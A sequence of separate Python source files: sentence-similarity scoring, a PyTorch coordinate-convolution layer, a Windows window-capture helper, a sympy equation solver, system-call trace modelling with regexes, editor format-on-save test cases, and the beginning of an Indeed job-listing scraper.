log.info("shorter sentence has too few words")
return False
if max(counts) > self.MAX_WORDS_IN_SENTENCE:
log.info("longer sentence has too many words")
return False
ratio, dist = self.__levenshtein_ratio(old_sent, new_sent)
if ratio > self.MAX_LEVENSHTEIN_RATIO:
log.info("too high levensthein ratio %.2f", ratio)
return False
return (ratio, dist)
def __sentence_pairs(self, old_frag, new_frag):
old_sents = self.__segmentize(old_frag)
new_sents = self.__segmentize(new_frag)
min_size = min(len(old_sents), len(new_sents))
for idx in range(min_size):
yield (' '.join(old_sents[idx].split()),
' '.join(new_sents[idx].split()))
def __segmentize(self, text):
return [frag
for sent in self.segmenter.tokenize(text)
for frag in sent.split('; ')]
def __levenshtein_ratio(self, old_sent, new_sent):
old_words = old_sent.split()
new_words = new_sent.split()
min_words = min(len(old_words), len(new_words))
dist = self.__levenshtein_on_words(old_words, new_words)
ratio = dist / float(min_words) * math.log(min_words,
self.LEVENSHTEIN_RATIO_LOG_BASE)
return (ratio, dist)
def __levenshtein_on_words(self, words1, words2):
char = 32 # 32 + 33 = 'A'
word_map = {}
for word in set(words1 + words2):
word_map[word] = chr((char % 93) + 33)
char += 1
list1 = ''.join([word_map[word] for word in words1])
list2 = ''.join([word_map[word] for word in words2])
return Levenshtein.distance(list1, list2)
|
import torch
from torch import nn
class add_coord(nn.Module):
def __init__(self):
super(add_coord, self).__init__()
def forward(self, x):
bs, ch, h, w = x.size()
h_coord = torch.range(start=0, end=h - 1).unsqueeze(0).unsqueeze(0).unsqueeze(-1).repeat([bs, 1, 1, w]) / (
h / 2) - 1
w_coord = torch.range(start=0, end=w - 1).unsqueeze(0).unsqueeze(0).unsqueeze(0).repeat([bs, 1, h, 1]) / (
w / 2) - 1
x = torch.cat([x, h_coord, w_coord], dim=1)
return x
class Coord2d(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True):
"""
Coord Convolution Module
"""
super(Coord2d, self).__init__()
self.add_coord = add_coord()
self.conv = nn.Conv2d(in_channels=in_channels + 2,
out_channels=out_channels,
kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups,
bias=bias)
def forward(self, x):
x = self.add_coord(x)
x = self.conv(x)
return x
def MiniBatchDiscrimination(x):
"""
To create mini batch diversity
applyied in discriminator in GAN
:param x: projected (bs,hs) tensor
:return: tensor in size (bs,hs)
"""
bs = x.size(0)
return -(x.unsqueeze(0).repeat([bs,1,1])-x.unsqueeze(-1).repeat([1,1,bs]).permute(0,2,1)).sum(1)
|
import win32gui
from PIL import ImageGrab
import math
import sys
def getTopWindowList():
root = win32gui.GetDesktopWindow()
children = []
def callback(hwnd, extra):
try:
if win32gui.IsWindowVisible(hwnd) and win32gui.IsWindowEnabled(hwnd):
children.append(
[win32gui.GetWindowText(hwnd), win32gui.GetClassName(hwnd)] )
except:
print(sys.exc_info()[0])
return True
try:
win32gui.EnumWindows( callback, 0 )
except:
print(sys.exc_info()[0])
return children
def getImageWith( param ):
if param.valid_message_fix_region:
return getImageOf(param.game_window_title, param.game_window_class,
param.message_fix_region)
else:
return getImageOf(param.game_window_title, param.game_window_class, None )
def getImageOf(window_title, window_class, region):
rect = getRectOf(window_title, window_class)
image = ImageGrab.grab()
if region:
work = [0, 0, 0, 0]
work[0] = region[0] + rect[0]
work[1] = region[1] + rect[1]
work[2] = region[2] + rect[0]
work[3] = region[3] + rect[1]
return image.crop(work)
else:
return image.crop(rect)
def getHandle(window_title, window_class):
window_class = window_class.strip()
window_title = window_title.strip()
if window_class == "":
window_class = None
if window_title == "":
window_title = None
return win32gui.FindWindow(window_class, window_title)
def getRectOf(window_title, window_class):
handle = getHandle(window_title, window_class)
return win32gui.GetWindowRect(handle)
if __name__ == '__main__':
getTopWindowList()
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys, time, re
from sympy.solvers import solve
from sympy import Symbol
def resolve(equation):
'''Resolve an equation with 1 unknown var'''
#Find the symbol
r = re.compile(r"([A-Za-z]{0,})")
varList = r.findall(equation)
symbol = ''
for a in range(0, len(varList)):
if len(varList[a]) > 0:
symbol = varList[a]
break
x = Symbol(symbol)
#replace 3x -> 3*x for example
r2 = re.compile(r'([0-9])'+symbol)
replaceList = r2.findall(equation)
for a in range(0, len(replaceList)):
if len(replaceList[a]) > 0:
equation = re.sub(r''+replaceList[a]+symbol, r''+replaceList[a]+'*'+symbol, equation)
#rewrite the eq to solve it
r3 = re.compile(r"(.{0,})\=(.{0,})")
results = r3.findall(equation)
mGauche = results[0][0]
mDroite = results[0][1]
return solve(mGauche + '-(' + mDroite + ')', x)
eq = sys.argv[1]
print(resolve(eq))
|
import IPython
import pickle
import numpy as np
import matplotlib.pyplot as plt
import re
import stat
import os
import sys
import random
from functools import reduce
from pathlib import Path
import nwalign as nw
from interruptingcow import timeout
from .classes import *
from .decorators import *
from .utils import *
## Declaring global objects
signal_regex = re.compile(r"--- SIG.* ---")
return_regex = re.compile(r"rt_sigreturn")
noisy_syscalls = ('futex', 'madvise', 'clock_gettime', 'sched_yield')
def all_symbols_for_api(kb, api):
ret = set()
for trace in kb[api]:
trace = prune_syscalls_args(trace)
for t, call in trace:
ret.add(call)
return ret
def traverse(d, api, visited=None):
if api in traverse.cache:
return traverse.cache[api]
if visited is None:
visited = set()
# Avoid infinite recursion. Fallback to False, this should be safe
if api in visited:
return False
visited |= set([api])
if api not in d:
traverse.cache[api] = False
return False
realizations = d[api]
ret = False
for r in realizations:
sys = get_syscall_list_from_trace(r)
if len(sys) != 0:
visited -= set([api])
traverse.cache[api] = True
return True
subapis = set()
for r in realizations:
subapis |= set(get_api_list_from_trace(r))
for subapi in subapis:
if traverse(d, subapi, visited):
visited -= set([api])
traverse.cache[api] = True
return True
visited -= set([api])
traverse.cache[api] = False
return False
def childs_are_weak_polymorph(d, api, visited=None):
if api in childs_are_weak_polymorph.cache:
return childs_are_weak_polymorph.cache[api]
if visited is None:
visited = set()
# Avoid infinite recursion. Fallback to False, this should be safe
if api in visited:
return False
visited |= set([api])
if api not in d:
childs_are_weak_polymorph.cache[api] = False
return False
realizations = d[api]
ret = False
subapis = set()
for r in realizations:
subapis |= set(get_api_list_from_trace(r))
for subapi in subapis:
if is_polymorphic(d, subapi):
visited -= set([api])
childs_are_weak_polymorph.cache[api] = True
return True
if is_leaf(d, subapi):
continue
if childs_are_weak_polymorph(d, subapi, visited):
visited -= set([api])
childs_are_weak_polymorph.cache[api] = True
return True
visited -= set([api])
childs_are_weak_polymorph.cache[api] = False
return False
def is_weak_polymorph(d, api):
if is_polymorphic(d, api):
return True
if is_leaf(d, api):
return False
return childs_are_weak_polymorph(d, api)
def is_leaf(d, api):
realizations = d[api]
ret = True
for r in realizations:
for call in r:
if call[0] == 'API':
ret = False
break
if not ret:
break
return ret
def find_leaves(d):
ret = set()
for api in d:
if is_leaf(d, api):
ret.add(api)
return ret
def realizations_are_equals(r1, r2):
r1 = prune_syscalls_args(r1)
r2 = prune_syscalls_args(r2)
if len(r1) != len(r2):
return False
for i in range(len(r1)):
if r1[i] != r2[i]:
return False
return True
def is_polymorphic(d, api):
realizations = d[api]
for i in range(len(realizations) - 1):
if not realizations_are_equals(realizations[i], realizations[i+1]):
return True
return False
def realization_is_empty(r):
return len(r) == 0
def is_empty(d, api):
realizations = d[api]
for r in realizations:
if not realization_is_empty(r):
return False
return True
def realization_makes_syscalls(r):
for call in r:
if call[0] == "SYS":
return True
return False
def makes_syscalls(d, api):
realizations = d[api]
for r in realizations:
if realization_makes_syscalls(r):
return True
return False
def has_indirect_sys(d, api):
return traverse(d, api)
def find_polymorph(d):
ret = set()
for api in d:
if is_polymorphic(d, api):
ret.add(api)
return ret
def find_weak_polymorph(d):
ret = set()
childs_are_weak_polymorph.cache = {}
for api in d:
if is_weak_polymorph(d, api):
ret.add(api)
return ret
def find_empties(d):
ret = set()
for api in d:
if is_empty(d, api):
ret.add(api)
return ret
def find_no_syscall_apis(d):
ret = set()
for api in d:
if not makes_syscalls(d, api):
ret.add(api)
return ret
def find_no_indirect_sys(d):
ret = set()
traverse.cache = {}
for api in d:
if not has_indirect_sys(d, api):
ret.add(api)
return ret
def measures(leaves, polymorph, no_sys, no_ind_sys,
no_leaves, monomorph, sys, ind_sys):
print("0Sys/0API/Polymorph: " + str(len(no_sys & leaves & polymorph)))
print("0Sys/0API/No-Polymorph: " + str(len(no_sys & leaves & monomorph)))
print("1+Sys/0API/Polymorph: " + str(len(sys & leaves & polymorph)))
print("1+Sys/0API/No-Polymorph: " + str(len(sys & leaves & monomorph)))
print("0Sys/1+API/Polymorph: " + str(len(no_sys & no_leaves & polymorph)))
print("0Sys/1+API/No-Polymorph: " +
str(len(no_sys & no_leaves & monomorph)))
print("1+Sys/1+API/Polymorph: " + str(len(sys & no_leaves & polymorph)))
print("1+Sys/1+API/No-Polymorph: " + str(len(sys & no_leaves & monomorph)))
print("0Ind_Sys/0API/Polymorph: " +
str(len(no_ind_sys & leaves & polymorph)))
print("0Ind_Sys/0API/No-Polymorph: " +
str(len(no_ind_sys & leaves & monomorph)))
print("1+Ind_Sys/0API/Polymorph: " +
str(len(ind_sys & leaves & polymorph)))
print("1+Ind_Sys/0API/No-Polymorph: " +
str(len(ind_sys & leaves & monomorph)))
print("0Ind_Sys/1+API/Polymorph: " +
str(len(no_ind_sys & no_leaves & polymorph)))
print("0Ind_Sys/1+API/No-Polymorph: " +
str(len(no_ind_sys & no_leaves & monomorph)))
print("1+Ind_Sys/1+API/Polymorph: " +
str(len(ind_sys & no_leaves & polymorph)))
print("1+Ind_Sys/1+API/No-Polymorph: " +
str(len(ind_sys & no_leaves & monomorph)))
print("0Sys/1+IndSys/Polymorph: " +
str(len(no_sys & ind_sys & polymorph)))
print("0Sys/1+IndSys/No-Polymorph: " +
str(len(no_sys & ind_sys & monomorph)))
def build_precise_model_for_api(d, api, strong_monomorph):
if api in build_precise_model_for_api.cache:
return build_precise_model_for_api.cache[api]
model = []
realization = d[api][0]
for call in realization:
if call[0] == 'SYS':
if (get_syscall_name(call[1]) not in ("futex", "madvise")
and not call[1].startswith("--- SIGCHLD")):
model.append(call)
continue
assert call[1] in strong_monomorph, (
"%s supposed to be strong monomorph, but it's not" % call[1])
model += build_precise_model_for_api(d, call[1], strong_monomorph)
build_precise_model_for_api.cache[api] = model
return model
def build_precise_models(d, strong_monomorph):
build_precise_model_for_api.cache = {}
models = {}
for api in strong_monomorph:
models[api] = build_precise_model_for_api(d, api, strong_monomorph)
return models
def prune_malloc_syscalls(trace, entry_offset=0):
if not hasattr(prune_malloc_syscalls, "mmap_regex"):
mmap_regex = re.compile(r"mmap2?\(.*PROT_READ\|PROT_WRITE," +
r" MAP_PRIVATE\|MAP_ANONYMOUS\|MAP_NORESERVE," +
r" -1, 0.*= (0x[a-f\d]+)")
prune_malloc_syscalls.mmap_regex = mmap_regex
prctl_regex = re.compile(r"prctl\(PR_SET_VMA," +
r" PR_SET_VMA_ANON_NAME, (0x[a-f\d]+).*" +
r"\"libc_malloc\".*")
prune_malloc_syscalls.prctl_regex = prctl_regex
munmap_regex = re.compile(r"munmap\((0x[a-f\d]+),.*\)")
prune_malloc_syscalls.munmap_regex = munmap_regex
ret = []
skip = 0
l = len(trace) - 1
for i, call in enumerate(trace):
if skip != 0:
skip -= 1
continue
if call[0+entry_offset] == "API":
ret.append(call)
continue
m1 = prune_malloc_syscalls.mmap_regex.match(call[1+entry_offset])
if i < l and m1:
m2 = prune_malloc_syscalls.prctl_regex.match(trace[i+1][1+entry_offset])
if m2 and m2.groups()[0] == m1.groups()[0]:
skip = 1
if i < l-1:
m3 = prune_malloc_syscalls.munmap_regex.match(
trace[i+2][1+entry_offset])
if m3 and m1.groups()[0] == m3.groups()[0]:
skip += 1
if i < l - 2 and 'munmap' in trace[i+3][1+entry_offset]:
skip += 1
continue
ret.append(call)
return ret
## Recursively try to build precise model for an API and its sub-API
def try_build_precise_model_for_api(d, api, models, visited=None):
if api in try_build_precise_model_for_api.cache:
return try_build_precise_model_for_api.cache[api]
if visited is None:
visited = set()
# Avoid infinite recursion. Fallback to False, this should be safe
if api in visited:
raise Exception()
visited.add(api)
if api in models:
try_build_precise_model_for_api.cache[api] = models[api]
visited -= set([api])
return models[api]
possible_models = []
for realization in d[api]:
try:
pm = []
for call in realization:
if call[0] == 'SYS':
if (get_syscall_name(call[1]) not in ("futex", "madvise")
and not call[1].startswith('--- SIGCHLD')):
pm.append(call)
continue
if call[1] in models:
pm += models[call[1]]
continue
## Try to build the model for the sub-API
subapi_model = try_build_precise_model_for_api(d, call[1],
models, visited)
if subapi_model is not None:
pm += subapi_model
else:
visited -= set([api])
try_build_precise_model_for_api.cache[api] = None
return None
except Exception:
continue
possible_models.append(pm)
ret = None
if len(possible_models) == 0:
return ret
for i in range(len(possible_models) - 1):
if not realizations_are_equals(possible_models[i],
possible_models[i+1]):
break
else:
ret = possible_models[0]
visited -= set([api])
try_build_precise_model_for_api.cache[api] = ret
return ret
def find_implicit_monomorph_models(d, models):
ret = dict(models)
try_build_precise_model_for_api.cache = {}
for api in d:
m = try_build_precise_model_for_api(d, api, models)
if m is not None:
ret[api] = m
return ret
def check_0sys(no_sys, no_ind_sys):
assert set(no_ind_sys) <= set(no_sys)
def check_polymorph(weak_polymorph, polymorph):
assert weak_polymorph >= polymorph
def check_empties_have_precise_model(empties, precise_models):
assert empties <= set(precise_models.keys())
def check_implicit_precise_models(implicit_precise_models, precise_models):
assert set(precise_models.keys()) <= set(implicit_precise_models.keys())
def check_empties_have_empty_model(empties, empty_models):
assert empties <= empty_models
def api_syscall_in_regex(reg):
ret = set()
for call in reg:
ret.add(call[0])
return ret
def symbols_generator(dictionary=None, start=0):
if hasattr(symbols_generator, "_symbols"):
return symbols_generator._symbols
assert dictionary is not None, "Needs a dict to generate the symbols"
symbols_set = set(dictionary)
indexes = [x for x in range(start, start+len(symbols_set))]
symbols = []
symbols.append({chr(i): x
for i, x in zip(indexes, symbols_set)})
forbidden = [c for c in list('$()*+-.?[\\]^|')]
for c in forbidden:
if c in symbols[0].keys():
symb = symbols[0][c]
symbols[0][c] = c
new_symb = chr(indexes[-1] + 1)
symbols[0][new_symb] = symb
indexes.append(indexes[-1] + 1)
else:
symbols[0][c] = c
symbols.append({y: x for x, y in symbols[0].items()})
ret = (symbols[0], symbols[1])
setattr(symbols_generator, "_symbols", ret)
return ret
def encode_regex(regex, symbols=None):
if symbols is None:
symbols = symbols_generator()[1]
ret = []
for entry in regex:
new_set = None
if type(entry[0]) == str:
new_set = set()
new_set.add(symbols[entry[0]])
else:
new_set = {symbols[x] for x in entry[0]}
ret.append((new_set, entry[1]))
return ret
def encode_regex_str(regex, symbols=None):
if symbols is None:
symbols = symbols_generator()[1]
ret = u"^"
for entry in regex:
if type(entry[0]) == str:
ret += symbols[entry[0]]
else:
ret += u'(' + u'|'.join([symbols[x] for x in entry[0]]) + u')'
if entry[1] == RegexFlags.OPTIONAL:
ret += u'?'
elif entry[1] == RegexFlags.MULTIPLE:
ret += u'+'
elif entry[1] == RegexFlags.OPTIONAL | RegexFlags.MULTIPLE:
ret += u'*'
ret += u'$'
return ret
def encode_trace(trace, symbols=None):
if symbols is None:
symbols = symbols_generator()[1]
trace = prune_syscalls_args(trace)
ret = u""
for call in trace:
if call[1] in symbols:
ret += symbols[call[1]]
return ret
def decode_sequence(seq, symbols=None):
if symbols is None:
symbols = symbols_generator()[0]
trace = []
for c in seq:
trace.append(symbols[c])
return trace
def decode_regex(reg, symbols):
ret = []
for sys, cond in reg:
if len(sys) == 1:
ret.append((symbols[sys.pop()], cond))
else:
ret.append(({symbols[x] for x in sys}, cond))
return ret
def decode_regex_str(reg, symbols=None):
if symbols is None:
symbols = symbols_generator()[0]
l = list(reg)
ret = RegexSequence()
sequences = []
cnt = 0
i = -1
## Skip the initial ^ character, if any
if l[0] == '^':
i += 1
i_max = len(l)
## Do not consider the final $ character, if any
if l[i_max-1] == '$':
i_max -= 1
while i < i_max-1:
i += 1
entry = ...
curr = l[i]
if curr == u'(': ## Begin of a sequence or an alternative
if cnt == 0:
sequences.append(u'')
else:
tmp = sequences.pop()
tmp += curr
sequences.append(tmp)
cnt += 1
continue
elif curr == u')': ## End of a sequence or an alternative
cnt -= 1
if cnt != 0:
tmp = sequences.pop()
tmp += curr
sequences.append(tmp)
continue
inside = sequences.pop()
alternatives = inside.split('|')
if len(alternatives) > 1:
alt_obj = RegexAlternative()
for alt in alternatives:
if len(alt) == 1:
alt_obj.add(RegexSimple(symbols[alt]))
elif len(alt) == 2 and alt[1] in '+?*':
alt_obj.add(RegexSimple(symbols[alt[0]],
RegexFlags.from_regex_modifier(alt[1])))
else:
## Got a new sequence here!
alt_obj.add(decode_regex_str(alt, symbols))
if i < i_max-1 and l[i+1] in '+?*':
ret.add(alt_obj, RegexFlags.from_regex_modifier(l[i+1]))
i += 1
else:
ret.add(alt_obj)
else:
new_seq = decode_regex_str(inside, symbols)
if i < i_max-1 and l[i+1] in '*?+':
new_seq.flag = RegexFlags.from_regex_modifier(l[i+1])
i += 1
ret.add(new_seq)
continue
## If we have already spot at least a '('
if len(sequences) != 0:
tmp = sequences.pop()
tmp += curr
sequences.append(tmp)
continue
## Current entry is just a symbol
entry = symbols[curr]
if i < i_max-1 and l[i+1] in '?+*':
entry_obj = RegexSimple(entry,
RegexFlags.from_regex_modifier(l[i+1]))
i += 1
else:
entry_obj = RegexSimple(entry)
ret.add(entry_obj)
if len(ret.expr) == 1 and type(ret.expr[0]) == RegexSequence:
ret = ret.expr[0]
return ret
def align_traces(trace1, trace2):
symbols = symbols_generator()
seq1 = encode_trace(trace1, symbols[1])
seq2 = encode_trace(trace2, symbols[1])
aligned = nw.global_align(seq1, seq2)
decoded1 = decode_sequence(aligned[0], symbols[0])
decoded2 = decode_sequence(aligned[1], symbols[0])
return (decoded1, decoded2)
def align_regex_trace(regex, trace):
symbols = symbols_generator()
seq1 = encode_regex(regex, symbols[1])
seq2 = encode_trace(trace, symbols[1])
aligned = nw.global_align_regex(seq1, seq2)
decoded1 = decode_regex(aligned[0], symbols[0])
decoded2 = decode_sequence(aligned[1], symbols[0])
return (decoded1, decoded2)
def sequence_match(regex, seq):
r = encode_regex_str(regex)
reg = re.compile(r)
seq = encode_trace(seq)
return reg.match(seq) is not None
def gen_regex(seq1, seq2):
ret = []
assert len(seq1) == len(seq2), "Sequences of different lenght"
for i in range(len(seq1)):
if seq1[i] == seq2[i]:
ret.append((seq1[i], RegexFlags.MANDATORY))
elif seq1[i] == "-":
ret.append((seq2[i], RegexFlags.OPTIONAL))
elif seq2[i] == "-":
ret.append((seq1[i], RegexFlags.OPTIONAL))
elif seq1[i] != seq2[i]:
ret.append((set([seq1[i], seq2[i]]), RegexFlags.MANDATORY))
else:
assert False, "This should never happen"
return ret
def update_regex(reg, seq):
ret = []
assert len(reg) == len(seq), "Sequences of different lenght"
for i in range(len(reg)):
if seq[i] in reg[i][0]:
ret.append(reg[i])
elif seq[i] == u"-":
ret.append((reg[i][0], RegexFlags.OPTIONAL | reg[i][1]))
elif reg[i][0] == u"-":
ret.append((seq[i], RegexFlags.OPTIONAL | reg[i][1]))
elif seq[i] not in reg[i][0]:
to_add = set()
if type(reg[i][0]) == str:
to_add.add(reg[i][0])
else:
to_add |= reg[i][0]
to_add.add(seq[i])
ret.append((to_add, reg[i][1]))
else:
assert False, "This should never happen"
return ret
def make_regex_conditional(regex):
return [(entry[0], entry[1] | RegexFlags.OPTIONAL) for entry in regex]
def total_trace_length(traces):
return sum([len(x) for x in traces])
def avg_trace_length(traces):
return total_trace_length(traces)/len(traces)
@timeout(5)
def check_trace_matches(regex, trace):
return regex.match_trace(trace, symbols_generator())
def check_traces_match(regex, traces, msg=''):
sys.stdout.flush()
success = 0
tout = 0
fails = 0
print(msg, end='')
for trace in traces:
print('.', end='')
try:
if check_trace_matches(regex, trace):
success += 1
else:
fails += 1
except RuntimeError:
tout += 1
print('')
return (success, tout, fails)
def regex_from_trace(trace):
ret = RegexSequence()
for x in trace:
if x[0] == 'SYS':
add = get_syscall_name(x[1])
else:
add = x[1]
ret.add(add)
return ret
def regex_for_api(kb, api):
traces = [t for t in kb[api] if len(t) != 0]
if len(traces) == 1:
return (regex_from_trace(traces[0]), 0, 0, 0)
if len(traces) == 0:
return None
if len(traces) > 10:
train_len = min([50, int(len(traces)/2)])
else:
train_len = len(traces)
test = traces[train_len:]
traces = traces[0:train_len]
first_alignement = align_traces(*traces[0:2])
regex = gen_regex(*first_alignement)
for trace in traces[2:]:
align = align_regex_trace(regex, trace)
regex = update_regex(*align)
reg_obj = RegexSequence.from_list(regex)
(success, tout, fails) = check_traces_match(reg_obj, traces,
'%s TRAIN' % api)
print(("### TRAIN Api: %s. %d traces. Matches/Timeouts/Fails %d/%d/%d" +
" test traces") % (api, len(kb[api]), success, tout, fails))
assert fails == 0, ("Regex for api %s failed to cover all" +
" the traces in the training set")
(success, tout, fails) = check_traces_match(reg_obj, test,
'%s TEST' % api)
print(("### TEST Api: %s. %d traces. Matches/Timeouts/Fails %d/%d/%d" +
" test traces\n") % (api, len(kb[api]), success, tout, fails))
return (reg_obj, success, tout, fails)
def regexes_for_kb(kb, syscalls, regexes=None):
symbols_generator({**kb, **syscalls})
if regexes is None:
regexes = {}
for api, traces in kb.items():
print(api)
if avg_trace_length(traces) > 100:
print("%s traces too big. Skipping" % api)
regexes[api] = ...
continue
if api not in regexes or regexes[api] is None:
regexes[api] = regex_for_api(kb, api)
if len(regexes) % 100 == 0:
dump_to_file(regexes, 'regex.pickle')
dump_to_file(regexes, 'regex.pickle')
return regexes
def test_regex(kb, api, regex):
traces = [x for x in kb[api] if len(x) != 0]
return check_traces_match(regex, traces)
def models_for_kb(kb, syscalls, models=None, debug=False):
return APIGenericModel.generate_models(kb, syscalls, models, debug)
def models_less_generic(kb, syscalls, models=None, debug=False):
return APILessGenericModel.generate_models(kb, syscalls, models, debug)
regex_find_conditional = re.compile(r'((.\?)+)')
def shrink_regex_repetitions(m):
symbol = m.groups()[0]
full_match = m.group()
match_conditionals = regex_find_conditional.search(full_match)
if not match_conditionals:
conditional = False
else:
conditional = match_conditionals.group() == full_match
return symbol + ('*' if conditional else '+')
regex_find_repetitions = re.compile(r'(.)\??(\1\??)+')
def regex_handle_single_call_repetitions(regex):
reg_str = encode_regex_str(regex)
new_reg = regex_find_repetitions.sub(shrink_regex_repetitions, reg_str)
return decode_regex_str(new_reg)
def shrink_repetitions(m):
symbol = m.groups()[0]
full_match = m.group()
if len(symbol) > 1 :
symbol = '(' + symbol + ')'
return symbol + '+'
find_repetitions = re.compile(r'(.+?)(\1)+')
def handle_call_repetitions(seq, original=None):
if original is None:
original = seq
if type(seq) == list:
trace = seq
enc = encode_trace(trace)
new_reg = find_repetitions.sub(shrink_repetitions, enc)
elif (isinstance(seq, RegexSequence) or
issubclass(type(seq), RegexSequence)):
reg = seq
enc = reg.to_string_regex(symbols_generator())
new_reg = find_repetitions.sub(shrink_repetitions, enc)
else:
print(type(seq))
assert False, seq
if enc == new_reg:
if enc == encode_trace(original):
try:
return decode_regex_str(encode_trace(original))
except:
return None
return None
try:
if not re.compile(new_reg).match(encode_trace(original)):
raise re.error('')
except re.error:
return None
try:
new_reg_obj = decode_regex_str(new_reg)
except:
return None
match = new_reg_obj.match_trace(original, symbols_generator(), full=True)
if not match:
return None
else:
res = handle_call_repetitions(new_reg_obj, original)
if res:
return res
else:
return new_reg_obj
def measures_regexes(regexes):
total_fails = 0
total_timeout = 0
total_success = 0
too_long = set()
too_short = set()
for api, r in regexes.items():
if r is None:
too_short.add(api)
continue
if r is ...:
too_long.add(api)
continue
total_fails += r[2]
total_timeout += r[1]
total_success += r[0]
total = total_fails + total_timeout + total_success
fails_ratio = total_fails / total
timeout_ratio = total_timeout / total
success_ratio = total_success / total
return success_ratio, timeout_ratio, fails_ratio
def measures_models(models):
total_fails = 0
total_success = 0
too_short = set()
total = 0
for api, model in models.items():
if model is None:
too_short.add(api)
continue
total_fails += model.test_results[1]
total_success += model.test_results[0]
total = total_fails + total_success
fails_ratio = total_fails / total
success_ratio = total_success / total
return success_ratio, fails_ratio
def troublesome_regexes(regexes, min=0.15, max=1):
ret = set()
for api, v in regexes.items():
if v is ... or v is None:
continue
total = sum(v[1:])
if total == 0:
continue
if min <= v[3]/total <= max:
ret.add((api, v[3]/total, total))
return sorted(list(ret), key=lambda x: -x[1])
def troublesome_models(models, min=0.15, max=1):
ret = set()
for api, model in models.items():
if model is None:
continue
results = model.test_results
if sum(results) == 0:
continue
fail_ratio = results[1]/sum(results)
if min <= fail_ratio <= max:
ret.add((api, fail_ratio, sum(results)))
return sorted(list(ret), key=lambda x: -x[1])
def expensive_regexes(regexes, min=0.01, max=1):
ret = set()
for api, v in regexes.items():
if v is ... or v is None:
continue
total = sum(v[1:])
if total == 0:
continue
if min <= v[2]/total <= max:
ret.add((api, v[2]/total, total))
return sorted(list(ret), key=lambda x: -x[1])
def regexes_split_test_results(regexes_test):
return ({**{api: regex[0] for (api, regex) in regexes_test.items()
if regex is not ... and regex is not None},
**{api: None for (api, regex) in regexes_test.items()
if regex is None}},
{**{api: tuple(regex[1:]) for (api, regex) in regexes_test.items()
if regex is not ... and regex is not None},
**{api: None for (api, regex) in regexes_test.items()
if regex is None}}
)
def prune_kb_from_empties(kb, empties):
ret = {}
for api, traces in kb.items():
ret[api] = []
for trace in traces:
n_trace = []
for call in trace:
if call[1] not in empties:
n_trace.append(call)
ret[api].append(n_trace)
return ret
def prune_kb_from_signals(kb):
ret = {}
for api, traces in kb.items():
ret[api] = []
for trace in traces:
new_trace = []
for call in trace:
if not signal_regex.match(call[1]):
new_trace.append(call)
ret[api].append(new_trace)
return ret
def shuffle_kb(kb):
for api, traces in kb.items():
random.shuffle(traces)
def apis_same_models(models):
ret = set()
i = 0
apis = list(models.keys())
while i < len(apis):
if models[apis[i]] is None:
i += 1
continue
j = i + 1
while j < len(apis):
if models[apis[j]] is None:
j += 1
continue
if len(models[apis[i]] & models[apis[j]]) > 0:
ret.add((apis[i], apis[j]))
break
j += 1
i += 1
return ret
def api_match_model(models, to_check):
for api, model in models.items():
if model is None:
continue
if len(model & to_check) > 0:
print('api %s matches' % api)
def find_leaves_models(models, syscalls):
leaves_apis = {}
if type(syscalls) == dict:
syscalls = set(syscalls.keys())
for api, model in models.items():
if model is None:
continue
r = model.leaf_models(syscalls, models)
if len(r) > 0 :
leaves_apis[api] = r
return leaves_apis
def kb_remove_hanging_calls(kb):
for api, traces in kb.items():
for trace in traces:
i = 0
while i < len(trace):
if trace[i][0] == 'API' and trace[i][1] not in kb:
print("Removing call to %s from API %s" % (trace[i][1], api))
del trace[i]
else:
i += 1
def overlapping_traces(kb, api):
traces = {tuple(get_syscall_name(y[1])
for y in get_syscall_list_from_trace(x))
for x in kb[api]}
ret = []
for k, v in kb.items():
if k == api:
continue
for t in v:
if len(t) == 0:
continue
if len(get_api_list_from_trace(t)) != 0:
continue
t = tuple(get_syscall_name(y[1])
for y in get_syscall_list_from_trace(t))
if t in traces:
ret.append((k, t))
return ret
#### local rare models: models whose frequency within the realizations of a given API is lower than a threshold
@persist("local_rare_cache", (1,))
def local_rare_models(models, threshold=0.01):
ret = {}
gen = ((api, ms) for api, ms in models.items() if ms)
for api, ms in gen:
tot = ms._counters['TOTAL']
ret[api] = []
for m, cnt in ms._counters.items():
if type(m) == str and m == 'TOTAL':
continue
if (cnt/tot) < threshold:
ret[api].append(m)
if len(ret[api]) == 0:
del ret[api]
return ret
def find_model_occurrence(models, find):
ret = set()
for api, ms in models.items():
if ms is None:
continue
for m in ms:
if m == find:
ret.add(api)
break
return ret
## rare = {API: [model1, model2, ...], ...}
#### global rare models: models that are rare for each API in which they appear
@persist("global_rare_cache", (2,))
def global_rare_models(models, rare=None, threshold=0.01):
if rare is None:
rare = local_rare_models(models, threshold)
tmp = reduce(lambda x, y: x+y, [x for x in rare.values()])
rare_list = []
for m in tmp:
if m not in rare_list:
rare_list.append(m)
rare_occurrences = {m: find_model_occurrence(rare, m) for m in rare_list}
all_occurrences = {m: find_model_occurrence(models, m) for m in rare_list}
global_rare = {m: rare_occurrences[m] for m in rare_list
if all_occurrences[m] == rare_occurrences[m]}
return global_rare
|
format_on_save_scenarios = [
({}, '', False),
({'format_on_save': True}, '', True),
({'format_on_save': False}, '', False),
({'format_on_save': '.test$'}, 'file.txt', False),
({'format_on_save': '.test$'}, 'file.test', True)
]
|
#!/usr/bin/env python
# coding: utf-8
__author__ = 'Lrakotoson'
__copyright__ = 'Copyright 2020, Jobtimize'
__license__ = 'MIT'
__version__ = '0.1.5'
__maintainer__ = 'Loïc Rakotoson'
__email__ = 'contact@loicrakotoson.com'
__status__ = 'planning'
__all__ = ['IndeedScrap']
""
from .rotateproxies import RotateProxies
from requests import get, Timeout
from requests.exceptions import HTTPError, ProxyError
from concurrent.futures import ThreadPoolExecutor
from itertools import islice
from datetime import datetime, timedelta
from bs4 import BeautifulSoup
import re
import warnings
""
def scrapPage(url, proxy=None):
"""
Scrap an html document from the URL
:url: page url
:proxy: dict of proxy
:return: html page, BeautifulSoup object
"""
with get(url, proxies=proxy) as response:
page = BeautifulSoup(response.text, 'html.parser')
return page
""
def scrapID(page):
"""
Collect the IDs of the job ads published on the active page
:page: html page, BeautifulSoup object
:return: set of IDs
"""
resultCol = page.find(id="resultsCol")
setID = {
jobcard["data-jk"]
for jobcard in resultCol.findAll("div",
{"class": "jobsearch-SerpJobCard"})
}
return setID
""
def stripmatch(page):
"""
Get the number of pages visited and match for the current search
:page: html page, BeautifulSoup object
:return: tuple
"""
try:
text = page.find(id="searchCountPages").text.strip()
except AttributeError:
repage = match = None
else:
